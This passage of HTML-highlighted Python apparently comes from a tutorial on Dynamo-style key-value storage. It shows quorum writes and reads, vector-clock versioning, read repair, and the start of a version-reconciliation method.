    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;R&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;W&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;R&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;R&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;W&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;W&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ring&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;ConsistentHashRing&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# ------------------------------------------------------------------ #
&lt;/span&gt;    &lt;span class="c1"&gt;#  WRITE                                                               #
&lt;/span&gt;    &lt;span class="c1"&gt;# ------------------------------------------------------------------ #
&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;put&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;object&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;VectorClock&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Write a key-value pair to N replicas, wait for W ACKs.

        The &lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;context&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt; is the vector clock from a previous read.
        Always pass context when updating an existing key — it tells
        Dynamo which version you&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;re building on top of, so it can
        detect whether your write is concurrent with anything else.

        Returns the new vector clock, which the caller should store
        and pass back on future writes to this key.

        Raises: RuntimeError if fewer than W nodes acknowledged.
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;preference_list&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ring&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_preference_list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;RuntimeError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;No nodes available&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# The coordinator is always the first node in the preference list.
&lt;/span&gt;        &lt;span class="n"&gt;coordinator&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

        &lt;span class="c1"&gt;# Increment the coordinator's counter in the vector clock.
&lt;/span&gt;        &lt;span class="c1"&gt;# If no context was provided (brand new key), start a fresh clock.
&lt;/span&gt;        &lt;span class="n"&gt;base_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;new_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base_clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;increment&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;coordinator&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;versioned&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;new_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Fan out to all N replicas.
&lt;/span&gt;        &lt;span class="c1"&gt;# In a real system these would be concurrent RPC calls.
&lt;/span&gt;        &lt;span class="c1"&gt;# Here we call them sequentially for simplicity.
&lt;/span&gt;        &lt;span class="n"&gt;ack_count&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;versioned&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;ack_count&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

        &lt;span class="c1"&gt;# Only need W ACKs to declare success.
&lt;/span&gt;        &lt;span class="c1"&gt;# The remaining replicas are updated asynchronously (or via
&lt;/span&gt;        &lt;span class="c1"&gt;# hinted handoff if they were down).
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;ack_count&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;W&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;RuntimeError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
                &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Write quorum not met: got &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;ack_count&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; ACKs, needed &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;W&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
            &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;[PUT] key=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="si"&gt;!r}&lt;/span&gt;&lt;span class="s"&gt;  value=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;!r}&lt;/span&gt;&lt;span class="s"&gt;  clock=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;new_clock&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;  &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
              &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;(&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;ack_count&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;/&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; nodes wrote)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;new_clock&lt;/span&gt;

    &lt;span class="c1"&gt;# ------------------------------------------------------------------ #
&lt;/span&gt;    &lt;span class="c1"&gt;#  READ                                                                #
&lt;/span&gt;    &lt;span class="c1"&gt;# ------------------------------------------------------------------ #
&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Read a key: query all N replicas, require at least R responses, reconcile.

        Returns a LIST of VersionedValues:
          - Length 1  → clean read, no conflict
          - Length &amp;gt;1 → concurrent versions detected; application must merge

        After reading, the caller should:
          1. If no conflict: use the single value normally.
          2. If conflict: merge the values using application logic,
             then call put() with the merged value and the merged
             vector clock as context. This &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;closes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt; the conflict.

        Read repair (done inline in this sketch; real Dynamo performs it
        asynchronously): any replica that returned a stale version is
        updated with the latest version.
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;preference_list&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ring&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_preference_list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Collect responses from all N nodes
&lt;/span&gt;        &lt;span class="n"&gt;all_versions&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
        &lt;span class="n"&gt;responding_nodes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;tuple&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;]]]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;

        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;   &lt;span class="c1"&gt;# None means the node is down
&lt;/span&gt;                &lt;span class="n"&gt;all_versions&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;extend&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="n"&gt;responding_nodes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;responding_nodes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;R&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;RuntimeError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
                &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Read quorum not met: got &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;responding_nodes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; responses, needed &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;R&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
            &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Reconcile: discard any version that is strictly dominated
&lt;/span&gt;        &lt;span class="c1"&gt;# (i.e., is a causal ancestor of) another version.
&lt;/span&gt;        &lt;span class="c1"&gt;# What remains is the set of concurrent versions.
&lt;/span&gt;        &lt;span class="n"&gt;reconciled&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;_reconcile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;all_versions&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Background read repair: if any node returned something older
&lt;/span&gt;        &lt;span class="c1"&gt;# than the reconciled result, send it the latest version.
&lt;/span&gt;        &lt;span class="c1"&gt;# (Simplified: only meaningful when there's a single winner.)
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;reconciled&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;latest&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;reconciled&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
            &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;versions&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;responding_nodes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;versions&lt;/span&gt; &lt;span class="ow"&gt;or&lt;/span&gt; &lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;latest&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                    &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;latest&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;   &lt;span class="c1"&gt;# Repair silently in background
&lt;/span&gt;
        &lt;span class="n"&gt;status&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;clean&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;reconciled&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;CONFLICT (&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;reconciled&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; versions)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;[GET] key=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="si"&gt;!r}&lt;/span&gt;&lt;span class="s"&gt;  status=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;status&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;  &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
              &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;(&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;responding_nodes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;/&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; nodes responded)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;reconciled&lt;/span&gt;

    &lt;span class="c1"&gt;# ------------------------------------------------------------------ #
&lt;/span&gt;    &lt;span class="c1"&gt;#  INTERNAL: VERSION RECONCILIATION                                   #
&lt;/span&gt;    &lt;span class="c1"&gt;# ------------------------------------------------------------------ #
&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;_reconcile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Remove any version that is a causal ancestor of another version.

        If version A&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s clock is dominated by version B&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s clock, then B
        is strictly newer — A adds no new information and can be dropped.

        Whatever remains after pruning are CONCURRENT versions: writes
        that happened without either &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;knowing about&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt; the other.
        The application must merge these using domain-specific logic.

        Example:
          versions = [clock={A:1}, clock={A:2}, clock={B:1}]
          {A:2} dominates {A:1}  → drop {A:1}
          {A:2} and {B:1} are concurrent → both survive
          result = [{A:2}, {B:1}]  ← conflict! application must merge
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;dominated&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;v1&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;v2&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
                &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;v2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dominates&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;v1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
